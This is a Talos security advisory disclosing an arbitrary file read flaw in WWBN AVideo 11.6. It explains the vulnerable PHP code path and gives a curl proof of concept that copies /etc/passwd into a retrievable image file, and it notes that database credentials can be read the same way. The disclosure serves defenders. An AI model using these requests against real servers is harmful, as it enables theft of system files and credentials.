Talos Vulnerability Report


WWBN AVideo aVideoEncoderReceiveImage information disclosure vulnerability

August 16, 2022
CVE Number



An information disclosure vulnerability exists in the aVideoEncoderReceiveImage functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.


The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6
WWBN AVideo dev master commit 3f7c0364


AVideo - https://github.com/WWBN/AVideo


6.5 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N


CWE-73 - External Control of File Name or Path


AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

The objects/aVideoEncoderReceiveImage.json.php file can be used to add images for the videos. This functionality does not need special configuration to be used. However, the user performing the request needs permission to upload videos.

_error_log("ReceiveImage: Start receiving image " . json_encode($_FILES) . "" . json_encode($_POST));
// check if there is en video id if yes update if is not create a new one
$video = new Video("", "", $_POST['videos_id']); // [1]
$obj->video_id = $_POST['videos_id'];

$videoFileName = $video->getFilename();
$paths = Video::getPaths($videoFileName, true);
$destination_local = "{$paths['path']}{$videoFileName}";

_error_log("ReceiveImage: videoFilename = [$videoFileName] destination_local = {$destination_local} Encoder receiving post " . json_encode($_FILES));

$obj->jpgDest = "{$destination_local}.jpg";
if (!empty($_REQUEST['downloadURL_image'])) {
    $content = url_get_contents($_REQUEST['downloadURL_image']); // [2]
    $obj->jpgDestSize = _file_put_contents($obj->jpgDest, $content); // [3]
    _error_log("ReceiveImage: download {$_REQUEST['downloadURL_image']} to {$obj->jpgDest} ". humanFileSize($obj->jpgDestSize));

At [1] a new video object is created, depending on the videos_id parameter (this video must be owned by the user making the request).
At [2] url_get_contents is called to retrieve the url defined by downloadURL_image (either via GET or POST).
At [3] the code saves the file to jpgDest.

function url_get_contents($url, $ctx = "", $timeout = 0, $debug = false) {
    global $global, $mysqlHost, $mysqlUser, $mysqlPass, $mysqlDatabase, $mysqlPort;
    if (ini_get('allow_url_fopen')) {
        if ($debug) {
            _error_log("url_get_contents: allow_url_fopen {$url}");
        try {
            $tmp = @file_get_contents($url, false, $context);

url_get_contents eventually uses file_get_contents (in default PHP configurations) to retrieve $url; however it can also be used to retrieve file paths. Since the user controls $url, a request can be made to copy any file in the host to the destination jpg, which can be later retrieved, allowing an attacker to read any file in the host. For example, it’s possible to retrieve videos/configuration.php, which contains database credentials, possibly leading to privilege escalation.

Exploit Proof of Concept

This proof-of-concept retrieves /etc/passwd. First, create a new video:

$ curl -k $'' \
    -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=ia8sm01gdn8kar80bp0q5bsp9l' \
    --data-raw $'format=mp4'

Copy /etc/passwd into a jpg file:

$ curl -k $'' \
    -H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=ia8sm01gdn8kar80bp0q5bsp9l' \
    --data-raw $'videos_id=193&downloadURL_image=/etc/passwd'

This gives us a jpg path. Retrieving it will reveal the contents of /etc/passwd:

$ curl -k $''

Vendor confirms issues fixed on July 7th 2022


2022-06-29 - Initial Vendor Contact
2022-07-05 - Vendor Disclosure
2022-07-07 - Vendor Patch Release
2022-08-16 - Public Release


Discovered by Claudio Bozzato of Cisco Talos.